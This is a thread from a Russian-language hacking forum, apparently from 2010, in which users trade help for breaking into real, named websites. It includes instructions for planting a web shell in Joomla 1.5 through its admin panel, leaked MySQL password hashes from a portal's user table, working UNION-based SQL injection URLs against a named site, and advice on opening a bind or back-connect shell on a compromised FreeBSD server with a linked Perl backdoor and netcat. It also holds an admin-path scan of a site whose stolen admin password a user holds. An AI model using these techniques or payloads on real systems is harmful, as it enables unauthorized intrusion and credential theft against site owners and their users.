Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
     
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Ищешь настройки,дописываешь php в разрешенный формат.Идешь в медиа-менеджер и льешь шелл в нужную тебе папку,насколько я понмню (лил давно как раз в 1.5) шелл будет в папке /images .
     
  3. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Привет! Попался мне тут портальчик на португальском языке и есть табличка с полями*значениями

    usr_frase*usr_senha:
    606715696665bada*3f886c5806f6861b
    606715696665bada*672e2ebf3645a3bc
    606715696665bada*3f886c5806f6861b
    606717496665bcba*2d793cff37fd171b

    Это, как я понял пары логин*пароль. Причём первая часть неизменна у разных пользователей (за редким исключением), а вторая меняется.

    Есть у кого мысли как расшифровать?


    UPD. Гугл сказал, что первая часть попадается тут: http://emsmat.sev.gob.mx/claves.php
     
    #13383 qq6ka, 4 Jun 2010
    Last edited: 4 Jun 2010
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    qq6ka

    это хеши mysql

    click
     
    _________________________
    1 person likes this.
  5. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    А я дебил. Усложняю себе жизнь. Спасибо.
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    установить модуль и тупо льешь туда шелл...
    либо извращаешся и устанавливаешь джумла ксплорер..а через него уже и шелла не надо..
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу вывести database(), кто может объяснить в чем дело?

    http://www.musicandmeaning.net/issues/showArticle.php?artID=-5.7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.musicandmeaning.net/fora/view_post.php?postid=2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7+limit+1,1--+
    
     
    2 people like this.
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    есть шелл на системе freebsd 7.2, нужен бекконект
    дальше /usr/local/www не пускает -"Can't open this folder!"
    Помогите пожалуйста
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    пробовал сразу в папку /tmp/ прыгнуть?
     
  11. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    да, cd /tmp/ не пашет..
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти.

    Или просто netcat-ом, если доступен в консоли

    https://forum.antichat.net/thread200753.html

    И сам сплойт необязательно запускать из /tmp

    и вообще поюзай поиск по сайту, всё тут есть
     
    #13392 Pashkela, 4 Jun 2010
    Last edited: 4 Jun 2010
  13. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    права на папку с которой запускаю бк drwxrwxrwx
    бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции
    Скажи как, а то я почти не знаю неткат-а

    ПС
    Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к /
    ППС
    мб фаервол мешает?
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    а как ты делаешь бекконнект? без нетката то? какой утилитой пользуешся?
    http://uasc.org.ua/files/backdoor.pl.txt
    вот тебе перловый биндшелл..меня много раз спасал когда всо не срабатывал, на серванте в шелле пишешь
    perl bind.pl
    у себя запускаешь неткат и пишешЬ nc 127.0.0.1 31337
    вместо локалхоста пишешь айпишник серванта...
     
  15. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    у себя то я знаю как использовать неткат, но как неткат-ом с одного серва коннектится к другому - не знаю..
    спс за бинд, но perl bind.pl ничего не происходит, как юзать perl bind.pl ip port? ili perl bind.pl ip ?
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    а сейф мод? a может стоит ограничение на исполнение? а перл есть на серванте?
     
    1 person likes this.
  17. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Safe mode: OFF
    перл есть..
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Есть pass админа, но админку не могу найти.Сайта про Майкла Джексона.


    » http://www.jacksonaction.com/images/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/_private/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/~root HTTP 403 Forbidden
    » http://www.jacksonaction.com/~nobody HTTP 403 Forbidden
    » http://www.jacksonaction.com/2009/ HTTP 200 OK
    » http://www.jacksonaction.com/bad/ HTTP 200 OK
    » http://www.jacksonaction.com/history/ HTTP 200 OK
    » http://www.jacksonaction.com/icons/ HTTP 200 OK
    » http://www.jacksonaction.com/index.php HTTP 200 OK
    » http://www.jacksonaction.com/search.php HTTP 200 OK
    » http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/text/ HTTP 403 Forbidden
    • Possible engine => FrontPage:
    » http://www.jacksonaction.com/_vti_bin/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/_vti_bin/_vti_aut/ HTTP 401 Authorization Required
    » http://www.jacksonaction.com/_vti_cnf/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/_vti_log/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/_vti_pvt/ HTTP 403 Forbidden
    » http://www.jacksonaction.com/_vti_txt/ HTTP 403 Forbidden
     
  19. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    admin page finder:
    http://th3-0utl4ws.com/tools/admin-finder/
     
  20. youger

    youger New Member

    Joined:
    3 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    как можно обойти пароль на папку?
     
Thread Status:
Not open for further replies.